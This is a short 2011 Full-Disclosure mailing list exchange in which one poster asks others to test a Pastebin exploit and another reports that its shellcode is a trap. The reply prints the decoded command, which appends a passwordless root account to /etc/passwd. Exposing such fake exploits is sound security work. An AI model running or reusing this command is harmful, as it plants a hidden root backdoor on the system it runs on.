On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: > I regularly trawl Pastebin.com to find code - often idiots leave some > 0day > and similar there and it is nice to find. > > Well, seeing as I have no test boxes at the moment, can someone check > this > code in a VM? I am not sure if it is legit or not. > > http://pastebin.com/ygByEV2e > > Thanks :) > > ~Darren
executing shellcode from that sploent gave me such string: > /bin/sh -c /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> > /etc/passwd#AAAABBBBCCCCDDDD :-/ do you have any other interesting odays? :) -- Cheers, Kai _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
